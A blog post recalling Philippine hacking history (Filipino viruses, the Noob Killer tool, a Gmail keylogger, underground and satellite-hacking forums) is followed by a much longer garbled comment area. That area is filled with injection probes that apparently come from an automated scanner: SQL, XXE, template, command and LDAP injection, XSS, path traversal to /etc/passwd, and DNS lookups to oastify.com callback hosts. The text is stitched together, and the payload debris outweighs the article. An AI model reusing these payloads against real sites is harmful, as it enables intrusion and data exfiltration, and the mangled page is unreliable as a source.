In our previous post we talked about the the I Love You Virus, the 4’ O Clock Project, and the 1st Cybercrime conviction in the Philippines. One of the main purposes of the previous article was to clear some conspiracy stories about the hacking scene in the Philippines.
Now, I know you may have some questions about the featured image in this article. It is actually an MS-DOS virus made in Mindanao State University – Iligan Institute of Technology. It was featured in a 1997 Virus Bulletin issue. My apologies though as it somehow defeats the title of our article that says “after Y2k bug” but I think it is important in the Philippine virus writing scene. Primarily, because it existed prior to the I Love You Virus and because it can be relived through Mikko Hyponnen’s Malware Museum.
Noob Killer
Taga Lipa Are, Long Live Sowar, Jollybeecute, Funny UST Scandal, and other Filipino virus variants were annoying viruses during the Windows XP days. I still remember playing with them back in college.
Some anti-viruses do not even detect them and only in the later years. Good thing, Noob Killer was created which is a simple utility that destroys some of these Filipino virus variants.
![Noo [noobkiller.jpg]](https://3.bp.blogspot.com/_H_mfjCLS1K0/SahwZ9stMiI/AAAAAAAAC1M/3nfUPwB-Hoc/s1600/noobkiller.jpg)
The developer of this utility was Leerz and he is a Filipino as well whose real name is still a mystery. One thing for sure is that his utility somehow helped PC users during the XP days.
Noob Killer existed since February 2007. Geez, I feel old!
![[noob+killer.jpg]](https://3.bp.blogspot.com/_H_mfjCLS1K0/SahwZmFSc6I/AAAAAAAAC1E/K8rG_815W5w/s1600/noob+killer.jpg)
BahayKubo Gmail Keylogger
In Internet cafes, keyloggers were a pain. The most famous keylogger to have ever existed in the PH underground scene was the Bahay Kubo Gmail Keylogger by dr3yfus.
dr3yfus was active in some Filipino forum sites like pinoyhackers.com. I still remember in ROOTCON’s forum site wherein he announced (probably 2009-2010) that he was just done with his OSCP and was asking if it’s okay to take CEH.
Enter Pinoyhackers.com (2009)
pinoyhackers.com was a controversial underground forum site because it is always featured in news websites and in the television whenever a Philippine government website is defaced.
This was because some of the former and second generation members of AsianPride lurk in this forum including some new underground groups during its time like ProjectX, PrivateX, and Philker.
The funny thing though is that this forum site got defaced many times and that there was this one time wherein the logo was named as “pinayhackers.com”.
Hardware, Satellite, and Communications Hacking in the early days…
Filsat (filsat.com) and Filhacks (filhacks.com) were the forum sites where the hardware, satellite and communications hackers lurk. Filsat existed since 2006 while Filhacks started in 2008. Sad to say these forum sites are now dead.

Filsat and Filhacks were like sister forum sites because some of the moderators and members of Filsat were also moderators and members of Filhacks but one should know that these two forum sites are not administered by the same web administrators. I know this because I was a member of these two forums, I was also also a moderator of Filhacks and that I knew both of the web administrators of the said forum sites. My dad back then was also an active member of the Filsat community as he is a satellite hobbyist.
Filsat focused mostly on building a satellite hobbyist community but then it also inseminated satellite hacking in the Philippines. It pioneered Dream Satellite Hacking! Yes, its members were the reason why Dream shifted to Nagravision 3 for its encryption and also the reason why Dream went bankrupt. It was the only Filipino forum site where you can see activation keys being flashed in the forum boards. Card sharing which is illegal was also being highlighted in this forum.
Filhacks on the other hand focused on free internet connection and hacking the USB dongles, Smart Canopies, and Globe WiNaxes. Some of its members were even persecuted for selling hacked WiMaxes. It was easy to hack them from creating proxies to mac cloning.
Filipino hackers were already doing IoT and Hardware hacking pre-ComeLeak because when Globe released bm622i routers, some hardware hackers hacked it by jtagging it, reflashing it and connecting to its UART port unlike the bm622 line of routers wherein you can just telnet into them. Although there are also some ways to hack it via factory reset or telnet for some bm622i routers.

Yes, IoT and Hardware Hacking in the Philippines was already a thing even before 2012. Notice the image above?
And so I leave you guys here for now. See you on the third series of this continuing article. For more updates just visit Nullforge’s Facebook page: https://www.facebook.com/nullforgesec.
EOF
(This is a continuing article series, see part 1)
COMMENT *
COMMENT *
(select extractvalue(xmltype(‘<!DOCTYPE root [ %sdvvh;]>’),’/l’) from dual)
COMMENT *’||(select extractvalue(xmltype(‘<!DOCTYPE root [ %sdvvh;]>’),’/l’) from dual)||’
COMMENT *;declare @q varchar(99);set @q=’\\ob3dv6wv1ai6ote49ky0m3pncei59vxrlib63tthi.oasti’+’fy.com\ion’; exec master.dbo.xp_dirtree @q;–
COMMENT *’;declare @q varchar(99);set @q=’\\u3yjnco1tgacgz6a1qq6e9ht4kab11pxdo4cwzmnb.oasti’+’fy.com\zkl’; exec master.dbo.xp_dirtree @q;–
COMMENT *);declare @q varchar(99);set @q=’\\egy30w1l60nwtjjuea3qrtudh4nvel2hq8iwaj07p.oasti’+’fy.com\vyv’; exec master.dbo.xp_dirtree @q;–
COMMENT *’);declare @q varchar(99);set @q=’\\705wkpleqt7pdc3ny3njbme61x7oyemaa13pvcl0a.oasti’+’fy.com\ucj’; exec master.dbo.xp_dirtree @q;–
(select load_file(‘\\\\ufdjzc015gmcsziadq26q9ttgkmbd11xporcjz9ny.oastify.com\\vti’))
COMMENT *’+(select load_file(‘\\\\qgaf081x6cn8tvj6em32r5uphgn7ex2tqkt8lvbj0.oastify.com\\wux’))+’
COMMENT *’
COMMENT *'(select*from(select(sleep(20)))a)’
COMMENT *’+(select*from(select(sleep(20)))a)+’
COMMENT *’ and (select*from(select(sleep(20)))a)–
COMMENT *,(select*from(select(sleep(20)))a)
COMMENT *’ waitfor delay’0:0:20′–
COMMENT *’)waitfor delay’0:0:20′–
COMMENT *’,0)waitfor delay’0:0:20′–
COMMENT *’||pg_sleep(20)–
COMMENT *’ AND pg_sleep(20)–
COMMENT *’,”||pg_sleep(20)–
COMMENT *’)AND pg_sleep(20)–
COMMENT *’,0)AND pg_sleep(20)–
COMMENT *37457903′ or ‘3384’=’3384
COMMENT *53744817′ or ‘4620’=’4622
COMMENT *78860568′ or ‘2829’=’2829
COMMENT *73559878′ or ‘2136’=’2136′
COMMENT *86405145′ or 9688=9688–
COMMENT *79985439′ or 2369=2371–
COMMENT *29802753′ or 3726=3726–
COMMENT *49594004′ or 8542=8542′–
COMMENT *’ and ‘2008’=’2008
COMMENT *’ and ‘6972’=’6975
COMMENT *’ and ‘7884’=’7884
COMMENT *’ and ‘4310’=’4310′
COMMENT *’ and 3484=3484–
COMMENT *’ and 4871=4872–
COMMENT *’ and 2643=2643–
COMMENT *’ and 3960=3960′–
COMMENT *”
j9cxwuuwj3
COMMENT *qvwcaqyzyg
COMMENT *alert(1)
COMMENT *ba5tmg7pjh
COMMENT *gipatalert(1)h8p8z
COMMENT *gipatalert(1)h8p8z
COMMENT *gipat%3cscript%3ealert%281%29%3c%2fscript%3eh8p8z
COMMENT *gipatalert(1)h8p8z
COMMENT *klyzyalert(1)ucur1
COMMENT *klyzyalert(1)ucur1
COMMENT *klyzy%3cScRiPt%3ealert%281%29%3c%2fScRiPt%3eucur1
COMMENT *klyzyalert(1)ucur1
COMMENT *knx7nc46u8
COMMENT *knx7nc46u8
COMMENT *knx7n%3ca%20b%3dc%3ec46u8
COMMENT *knx7nc46u8
b4abw${153*746}zgbrm
yoh89{{977*640}}uq5ka
bgjf4#{945*649}mlbnr
twswj[[610*778]]gbm12
txc3i${file.separator}d0mzl
afzfk%{858*619}ccslw
hanyo{{476|add:980}}an83c
#set ($a=272*396) sjsot${a}fhzaw
uz14fcyedb
w763c
= 851*680
zu3x8{{.}}kx1ar{{..}}ajqc9
io910__${360*623}__ogpi9
COMMENT *}}wpuw1’/”<tl0x9
COMMENT *%}eil3g’/”<wy3mn
COMMENT *t8g5p%>g6yiu’/”<mxyrf
COMMENT *’+sleep(20.to_i)+’
COMMENT *’+eval(compile(‘for x in range(1):\n import time\n time.sleep(20)’,’a’,’single’))+’
eval(compile(‘for x in range(1):\n import time\n time.sleep(20)’,’a’,’single’))
COMMENT *’.sleep(20).’
COMMENT *{${sleep(20)}}
stxxtcqvvjqv7l2uhiev
4tt40knh1f%41ac3yh0bas8
rfhxxpjig4\\lkh2alpez9
qqphfbs5neAuz204kipcb
qqphfbs5neAuz204kipcb
COMMENT *fal9jnuh16752bhmy0hv
COMMENT *dm85uv65yk%41jz17e33rw1
COMMENT *umdc0t9khi\\lzfpwy13mu
COMMENT *ppkovbphzeAuzs1cv85zm
COMMENT *ppkovbphzeAuzs1cv85zm
yhjn1g257kogu3kefu4asdvxiooff531rtfl2bq0.oastify.com
http://0vwpfig7lm2i85ygtwic6f9zwq2ht7h35ttlgb40.oastify.com?COMMENT *
nslookup -q=cname ei032w3l80pwvjluga5qttwdj4pvgl4hsavynld92.oastify.com.&
COMMENT *|nslookup -q=cname 6nuv7o8ddsuo0bqml2aiyl15owunld99x5lx8nwc.oastify.com.&
COMMENT *'”`0&nslookup -q=cname xpqm9fa4fjwf22sdntc90c3wqnwen4b0zxnpafy4.oastify.com.&`’
COMMENT *&nslookup -q=cname ptmed7ewjb076uw5rlg1447ouf06rwfs3nrfe52u.oastify.com.&’\”`0&nslookup -q=cname ptmed7ewjb076uw5rlg1447ouf06rwfs3nrfe52u.oastify.com.&`’
COMMENT *|echo 05ai3qu2j4 39mrahydbv||a #’ |echo 05ai3qu2j4 39mrahydbv||a #|” |echo 05ai3qu2j4 39mrahydbv||a #
COMMENT *&echo lfpt2pcwsc cur405uynl&
COMMENT *”|echo g6rmjitlj9 zhixyr2uz3 ||
COMMENT *’|echo 2lyiuau7ed 8j4wlk4wca #xzwx
COMMENT *|ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #’ |ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #\” |ping -n 21 127.0.0.1
COMMENT *|ping -c 21 127.0.0.1||x
COMMENT *|ping -c 1 127.0.0.1||x
COMMENT *&ping -n 21 127.0.0.1&
COMMENT *’|ping -c 21 127.0.0.1 #
COMMENT *”|ping -n 21 127.0.0.1 ||
hok10miynr)(objectClass=*
sqmmlp32cc)(!(objectClass=*)
xaevcwx1rj)(!(!(objectClass=*))
evoh796oz9)(!(!(!(objectClass=*)))
*)(objectClass=*
*)(!(objectClass=*)
*)(!(!(objectClass=*))
*)(!(!(!(objectClass=*)))
jfg
COMMENT *]]>><
COMMENT *’+(function(){if(typeof pww01===”undefined”){var a=new Date();do{var b=new Date();}while(b-a<20000);pww01=1;}}())+'
“–>’–>`–>
COMMENT *
BCC:[email protected]
qcu: j
COMMENT *>
BCC:[email protected]
oxf: c
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
(select extractvalue(xmltype(‘<!DOCTYPE root [ %jgogw;]>’),’/l’) from dual)
COMMENT *’||(select extractvalue(xmltype(‘<!DOCTYPE root [ %jgogw;]>’),’/l’) from dual)||’
COMMENT *;declare @q varchar(99);set @q=’\\vkjk4d52ahrdx0nbir77vayullrci2630rrhf92zqo.oasti’+’fy.com\vfo’; exec master.dbo.xp_dirtree @q;–
COMMENT *’;declare @q varchar(99);set @q=’\\lpea93asf7w32qs1nhcx003kqbw2nsbt5hw8k07qvf.oasti’+’fy.com\uhn’; exec master.dbo.xp_dirtree @q;–
COMMENT *);declare @q varchar(99);set @q=’\\qysfi8jxoc58bv16wml295cpzg57wxkyem5et6gw4l.oasti’+’fy.com\wmy’; exec master.dbo.xp_dirtree @q;–
COMMENT *’);declare @q varchar(99);set @q=’\\vzykjdk2ph6dc02bxrm7aadu0l6cx2l3fr6kuch25r.oasti’+’fy.com\vjg’; exec master.dbo.xp_dirtree @q;–
(select load_file(‘\\\\m4rbo4ptu8b4hr722iryf1il5cb32tqukibkzcm2ar.oastify.com\\mwc’))
COMMENT *’+(select load_file(‘\\\\kzn9j2krp662cp20xgmwazdj0a61xrlsfg6jubh15q.oastify.com\\qik’))+’
COMMENT *’
COMMENT *'(select*from(select(sleep(20)))a)’
COMMENT *+(select*from(select(sleep(20)))a)+
COMMENT *’+(select*from(select(sleep(20)))a)+’
COMMENT * and (select*from(select(sleep(20)))a)–
COMMENT *’ and (select*from(select(sleep(20)))a)–
COMMENT *,(select*from(select(sleep(20)))a)
COMMENT * waitfor delay’0:0:20′–
COMMENT *’ waitfor delay’0:0:20′–
COMMENT *)waitfor delay’0:0:20′–
COMMENT *’)waitfor delay’0:0:20′–
COMMENT *,0)waitfor delay’0:0:20′–
COMMENT *’,0)waitfor delay’0:0:20′–
COMMENT *||pg_sleep(20)–
COMMENT *’||pg_sleep(20)–
COMMENT * AND pg_sleep(20)–
COMMENT *’ AND pg_sleep(20)–
COMMENT *,”||pg_sleep(20)–
COMMENT *’,”||pg_sleep(20)–
COMMENT *
(select extractvalue(xmltype(‘<!DOCTYPE root [ %qtfrc;]>’),’/l’) from dual)
COMMENT *’||(select extractvalue(xmltype(‘<!DOCTYPE root [ %qtfrc;]>’),’/l’) from dual)||’
COMMENT *;declare @q varchar(99);set @q=’\\ydfzp3zvvui9lh58kzohhzvkxb34rxfo5cxznnc.oasti’+’fy.com\uty’; exec master.dbo.xp_dirtree @q;–
COMMENT *’;declare @q varchar(99);set @q=’\\ridsuw4o0nn2qaa1pstams0d248xwqkhb53stgi.oasti’+’fy.com\yqq’; exec master.dbo.xp_dirtree @q;–
COMMENT *);declare @q varchar(99);set @q=’\\vzywb0lshr467er56wae3whhj8p1du1lt9lwbk0.oasti’+’fy.com\mti’; exec master.dbo.xp_dirtree @q;–
COMMENT *’);declare @q varchar(99);set @q=’\\akybwf6726plstckrbvtob2w4nagy9m0fo7bxzm.oasti’+’fy.com\iwu’; exec master.dbo.xp_dirtree @q;–
(select load_file(‘\\\\ywyz83iveu194ho83z7h0zekgbm4axyo0cszin7.oastify.com\\tbt’))
COMMENT *’+(select load_file(‘\\\\fl4gxk7c3bqqtydpsgwypg315sblzen5qtig84x.oastify.com\\dvg’))+’
COMMENT *’
(select*from(select(sleep(20)))a)
COMMENT *'(select*from(select(sleep(20)))a)’
COMMENT *+(select*from(select(sleep(20)))a)+
COMMENT *’+(select*from(select(sleep(20)))a)+’
COMMENT * and (select*from(select(sleep(20)))a)–
COMMENT *’ and (select*from(select(sleep(20)))a)–
COMMENT *,(select*from(select(sleep(20)))a)
COMMENT * waitfor delay’0:0:20′–
COMMENT *’ waitfor delay’0:0:20′–
COMMENT *)waitfor delay’0:0:20′–
COMMENT *’)waitfor delay’0:0:20′–
COMMENT *,0)waitfor delay’0:0:20′–
COMMENT *’,0)waitfor delay’0:0:20′–
COMMENT *||pg_sleep(20)–
COMMENT *’||pg_sleep(20)–
COMMENT * AND pg_sleep(20)–
COMMENT *’ AND pg_sleep(20)–
COMMENT *,”||pg_sleep(20)–
COMMENT *’,”||pg_sleep(20)–
COMMENT *)AND pg_sleep(20)–
COMMENT *’)AND pg_sleep(20)–
COMMENT *,0)AND pg_sleep(20)–
COMMENT *’,0)AND pg_sleep(20)–
COMMENT *87689276′ or ‘1357’=’1357
COMMENT *37505868′ or ‘9854’=’9861
COMMENT *44641766′ or ‘8048’=’8048
COMMENT *71713546′ or ‘2953’=’2953′
COMMENT *41331878′ or 7267=7267–
COMMENT *54411303′ or 2047=2054–
COMMENT *24452925′ or 4792=4792–
COMMENT *62513875′ or 3304=3304′–
COMMENT *’ and ‘1213’=’1213
COMMENT *’ and ‘2003’=’2009
COMMENT *’ and ‘8109’=’8109
COMMENT *’ and ‘8564’=’8564′
COMMENT *’ and 7754=7754–
COMMENT *’ and 1501=1506–
COMMENT *’ and 3632=3632–
COMMENT *’ and 5139=5139′–
COMMENT *”
bua3rrk2vh
COMMENT *45cv31zolx
COMMENT *alert(1)
COMMENT *idn5qn4qwi
COMMENT *bdh0ealert(1)y3wjx
COMMENT *bdh0ealert(1)y3wjx
COMMENT *bdh0e%3cscript%3ealert%281%29%3c%2fscript%3ey3wjx
COMMENT *bdh0ealert(1)y3wjx
COMMENT *kp2tqalert(1)r3v89
COMMENT *kp2tqalert(1)r3v89
COMMENT *kp2tq%3cScRiPt%3ealert%281%29%3c%2fScRiPt%3er3v89
COMMENT *kp2tqalert(1)r3v89
COMMENT *xaodsb6a45
COMMENT *xaodsb6a45
COMMENT *xaods%3ca%20b%3dc%3eb6a45
COMMENT *xaodsb6a45
cvkra${563*895}npusa
vcokn{{531*308}}y6ibh
t7gfe#{124*969}vpb5l
ri65g[[919*779]]hducr
pohvy${file.separator}mr3fx
orhm5%{877*372}iuem1
s042v{{946|add:615}}yf3l9
#set ($a=492*106) eom8x${a}v06cs
ke5aaazf2p
cxuic
= 280*649
g5sts{{.}}v5tb3{{..}}iw2c4
qiqca__${666*810}__lj1w9
COMMENT *}}hxh8u’/”<u8bm6
COMMENT *%}ma2ol’/”<izmx8
COMMENT *wh7un%>ejx3y’/”<npity
COMMENT *’+sleep(20.to_i)+’
COMMENT *’+eval(compile(‘for x in range(1):\n import time\n time.sleep(20)’,’a’,’single’))+’
eval(compile(‘for x in range(1):\n import time\n time.sleep(20)’,’a’,’single’))
COMMENT *’.sleep(20).’
COMMENT *{${sleep(20)}}
gmbk2nuzi7wt9hp44cgf
eeefkv79m0%41w0gso84qt9
bdy3e9afa5\\lonw51daau
0ps0xv9mlaA0nhy3f820b
0ps0xv9mlaA0nhy3f820b
COMMENT *gs3fwapcii1k6unp7nkd
COMMENT *vobzav0s7w%413c2snz8v0i
COMMENT *kdrx96wq60\\l8iz8lvww9
COMMENT *b8gbbsz2z9Anlg6bngjio
COMMENT *b8gbbsz2z9Anlg6bngjio
xhiyt23uztm8pg97oysglyzj1a73vwjo7gu6iv.oastify.com
http://w41xg1qtms97cfw6bxff8xmio9u2iv6ludh35s.oastify.com?COMMENT *
nslookup -q=cname 2sv347ezayxd0lkcz33lw3aocfi861uuxip5ft4.oastify.com.&
COMMENT *|nslookup -q=cname ykmzw36v2up9shc8rzvhoz2k4ba4yxmtalxbl0.oastify.com.&
COMMENT *'”`0&nslookup -q=cname ukivwz6r2qp5sdc4rvvdov2g47a0ytmqaix8lx.oastify.com.&`’
COMMENT *&nslookup -q=cname 2223e7ozky7daluc93dl63komfs8g14wsofe33.oastify.com.&’\”`0&nslookup -q=cname 2223e7ozky7daluc93dl63komfs8g14wsofe33.oastify.com.&`’
COMMENT *|echo 9c4qdmf1qm l7m12gwf6q||a #’ |echo 9c4qdmf1qm l7m12gwf6q||a #|” |echo 9c4qdmf1qm l7m12gwf6q||a #
COMMENT *&echo wlujhqxio4 xerpnlilcw&
COMMENT *”|echo ipejwmo6rz 98o31gbjqw ||
COMMENT *’|echo jvyggym37x alwppzvcfk #xzwx
COMMENT *|ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #’ |ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #\” |ping -n 21 127.0.0.1
COMMENT *|ping -c 21 127.0.0.1||x
COMMENT *&ping -n 21 127.0.0.1&
COMMENT *’|ping -c 21 127.0.0.1 #
COMMENT *”|ping -n 21 127.0.0.1 ||
..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini
c:\windows\win.ini
../../../../../../../../../../../../../../../../windows/win.ini
..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\winnt\win.ini
../../../../../../../../../../../../../../../../winnt/win.ini
\windows\win.ini
file:///c:/windows/win.ini
…\.\…\.\…\.\…\.\…\.\…\.\…\.\…\.\…\.\…\.\windows\win.ini
…/.\…/.\…/.\…/.\…/.\…/.\…/.\…/.\…/.\…/.\windows/win.ini
…\./…\./…\./…\./…\./…\./…\./…\./…\./…\./windows/win.ini
windowswin.ini
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini
COMMENT *..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini
COMMENT *../../../../../../../../../../../../../../../../windows/win.ini
COMMENT *..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\winnt\win.ini
COMMENT *../../../../../../../../../../../../../../../../winnt/win.ini
..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.iniCOMMENT *
c:\windows\win.iniCOMMENT *
..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\winnt\win.iniCOMMENT *
../../../../../../../../../../../../../../../../etc/passwd
/etc/passwd
file:///etc/passwd
…/./…/./…/./…/./…/./…/./…/./…/./…/./…/./etc/passwd
etcpasswd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
COMMENT *../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../etc/passwdCOMMENT *
…/COMMENT *
./COMMENT *
././COMMENT *
lyv/COMMENT *
./wp-comments-post.php
…/wp-comments-post.php
tgl/wp-comments-post.php
././wp-comments-post.php
/./wp-comments-post.php
/…/wp-comments-post.php
/hnm/wp-comments-post.php
/././wp-comments-post.php
nzn1lp7503)(objectClass=*
fmpxfrsdqd)(!(objectClass=*)
54sa3inwm3)(!(!(objectClass=*))
w07vy0a7f7)(!(!(!(objectClass=*)))
*)(objectClass=*
*)(!(objectClass=*)
*)(!(!(objectClass=*))
*)(!(!(!(objectClass=*)))
vyk
COMMENT *]]>><
COMMENT *’+(function(){if(typeof c5fyq===”undefined”){var a=new Date();do{var b=new Date();}while(b-a<20000);c5fyq=1;}}())+'
“–>’–>`–>
COMMENT *
BCC:[email protected]
fje: d
COMMENT *>
BCC:[email protected]
mmk: l
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
COMMENT *
(select extractvalue(xmltype(‘<!DOCTYPE root [ %bmrhm;]>’),’/l’) from dual)
COMMENT *’||(select extractvalue(xmltype(‘<!DOCTYPE root [ %bmrhm;]>’),’/l’) from dual)||’
COMMENT *;declare @q varchar(99);set @q=’\\3x1498j0fz2e5mpd448m14fphgn9b2ztphh47sw.oasti’+’fy.com\lou’; exec master.dbo.xp_dirtree @q;–
COMMENT *’;declare @q varchar(99);set @q=’\\zux064gwcvza2im9105iy0cleck58ywpndf05ou.oasti’+’fy.com\cym’; exec master.dbo.xp_dirtree @q;–
COMMENT *);declare @q varchar(99);set @q=’\\msin4rejaixx05kwzn35wna8czis6lucm0en4bt.oasti’+’fy.com\zer’; exec master.dbo.xp_dirtree @q;–
COMMENT *’);declare @q varchar(99);set @q=’\\mkanwr6j2ipxs5cwrnv5on284zasylmcf07nxbm.oasti’+’fy.com\hzk’; exec master.dbo.xp_dirtree @q;–
(select load_file(‘\\\\5qw62ac281vgyoifx61ou68raigb44svujm6cu1.oastify.com\\lpr’))
COMMENT *’+(select load_file(‘\\\\0kl1w56x2wpbsjcar1vjo12m4da6yzmqpeh17pw.oastify.com\\iyu’))+’
COMMENT *91236373′ or ‘5879’=’5879
COMMENT *99743594′ or ‘1400’=’1405
COMMENT *59953675′ or ‘1503’=’1503
COMMENT *82323088′ or ‘5046’=’5046′
COMMENT *72046966′ or 5144=5144–
COMMENT *26919801′ or 4641=4647–
COMMENT *48355739′ or 4377=4377–
COMMENT *77564194′ or 1138=1138′–
COMMENT *’ and ‘8839’=’8839
COMMENT *’ and ‘8113’=’8121
COMMENT *’ and ‘1776’=’1776
COMMENT *’ and ‘6217’=’6217′
COMMENT *’ and 6119=6119–
COMMENT *’ and 1688=1695–
COMMENT *’ and 6068=6068–
COMMENT *’ and 6481=6481′–
ospg04a7nd
COMMENT *1urzl0acy0
COMMENT *alert%281%29
COMMENT *cu7xib9bna
COMMENT *l75oralert(1)xoefs
COMMENT *l75oralert(1)xoefs
COMMENT *l75or%3cscript%3ealert%281%29%3c%2fscript%3exoefs
COMMENT *l75oralert(1)xoefs
COMMENT *hhuv3alert(1)oyx0i
COMMENT *hhuv3alert(1)oyx0i
COMMENT *hhuv3%3cScRiPt%3ealert%281%29%3c%2fScRiPt%3eoyx0i
COMMENT *hhuv3alert(1)oyx0i
COMMENT *paax2t57ff
COMMENT *paax2t57ff
COMMENT *paax2%3ca%20b%3dc%3et57ff
COMMENT *paax2t57ff
rkxe3${449*906}uh197
dh9sj{{436*381}}p6mkd
